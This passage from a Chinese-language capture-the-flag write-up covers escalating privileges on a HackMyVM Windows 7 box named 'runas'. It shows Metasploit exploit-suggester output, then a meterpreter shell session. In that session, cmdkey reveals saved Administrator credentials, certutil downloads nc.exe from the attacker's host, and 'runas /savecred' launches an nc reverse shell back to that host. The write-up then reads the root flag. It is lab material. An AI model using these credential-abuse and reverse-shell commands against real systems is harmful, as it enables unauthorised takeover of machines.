[+] 192.168.10.105 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.10.105 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 192.168.10.105 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 192.168.10.105 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
8 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
9 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
10 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
11 exploit/windows/local/always_install_elevated No The target is not exploitable.
12 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
13 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
14 exploit/windows/local/bthpan No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
19 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
20 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
21 exploit/windows/local/ikeext_service No The check raised an exception.
22 exploit/windows/local/ipass_launch_app No The check raised an exception.
23 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
24 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
25 exploit/windows/local/mqac_write No The target is not exploitable.
26 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
27 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
28 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
42 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
runas反弹rootshell
然后就开始了漫长的翻信息阶段。。。。直到无意中翻到:
https://www.cnblogs.com/kqdssheng/p/18751119
也可以使用winPEAS进行枚举!又学到了一点!需要传一个nc上去:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
meterpreter > shell
Process 2512 created.
Channel 5 created.
Microsoft Windows [S�r�m 6.1.7601]
Telif Hakk� (c) 2009 Microsoft Corporation. T�m haklar� sakl�d�r.
C:\Users\runas>whoami /priv
whoami /priv
AYRICALIK B�LG�LER�
----------------------
Ayr�cal�k Ad� A��klama Durum
============================= ================================== =====
SeShutdownPrivilege Sistemi kapat Etkin
SeChangeNotifyPrivilege �apraz ge�i� denetimini atla Etkin
SeUndockPrivilege Bilgisayar� takma biriminden ��kar Etkin
SeIncreaseWorkingSetPrivilege ��lem �al��ma k�mesini art�r Etkin
SeTimeZonePrivilege Saat dilimini de�i�tir Etkin
C:\Users\runas>cmdkey /list
cmdkey /list
Depolanan ge�erli kimlik bilgileri:
Hedef: Domain:interactive=RUNAS-PC\Administrator
T�r: Etki Alan� Parolas�
Kullan�c�: RUNAS-PC\Administrator
C:\Users\runas>certutil -urlcache -split -f http://192.168.10.103:8888/nc.exe
certutil -urlcache -split -f http://192.168.10.103:8888/nc.exe
**** �evrimi�i ****
0000 ...
96d8
CertUtil: -URLCache komutu ba�ar�yla tamamland�.
C:\Users\runas>dir
dir
C s�r�c�s�ndeki birimin etiketi yok.
Birim Seri Numaras�: 542C-C630
C:\Users\runas dizini
08.06.2025 05:37 <DIR> .
08.06.2025 05:37 <DIR> ..
06.10.2024 21:38 <DIR> Contacts
09.10.2024 18:24 <DIR> Desktop
06.10.2024 21:38 <DIR> Documents
06.10.2024 21:38 <DIR> Downloads
06.10.2024 21:38 <DIR> Favorites
06.10.2024 21:38 <DIR> Links
06.10.2024 21:38 <DIR> Music
08.06.2025 05:37 38.616 nc.exe
06.10.2024 21:38 <DIR> Pictures
06.10.2024 21:38 <DIR> Saved Games
06.10.2024 21:38 <DIR> Searches
08.06.2025 05:02 73.802 shell.exe
06.10.2024 21:38 <DIR> Videos
2 Dosya 112.418 bayt
13 Dizin 21.674.962.944 bayt bo�
C:\Users\runas>runas /env /noprofile /savecred /user:Administrator "C:\Users\runas\nc.exe 192.168.10.103 1234 -e cmd.exe"
runas /env /noprofile /savecred /user:Administrator "C:\Users\runas\nc.exe 192.168.10.103 1234 -e cmd.exe"
拿到flag!!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
C:\Users\runas>cd ..
cd ..
C:\Users>dir
dir
C s�r�c�s�ndeki birimin etiketi yok.
Birim Seri Numaras�: 542C-C630
C:\Users dizini
06.10.2024 22:21 <DIR> .
06.10.2024 22:21 <DIR> ..
06.10.2024 21:44 <DIR> Administrator
06.10.2024 22:21 <DIR> Classic .NET AppPool
06.10.2024 22:05 <DIR> DefaultAppPool
12.04.2011 18:08 <DIR> Public
08.06.2025 05:37 <DIR> runas
0 Dosya 0 bayt
7 Dizin 21.674.926.080 bayt bo�
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
C s�r�c�s�ndeki birimin etiketi yok.
Birim Seri Numaras�: 542C-C630
C:\Users\Administrator\Desktop dizini
08.10.2024 18:12 <DIR> .
08.10.2024 18:12 <DIR> ..
08.10.2024 17:09 24 root.txt
1 Dosya 24 bayt
2 Dizin 21.674.926.080 bayt bo�
C:\Users\Administrator\Desktop>type root.txt
type root.txt
HMV{Username_Is_My_Hint}
本文由作者按照 CC BY 4.0 进行授权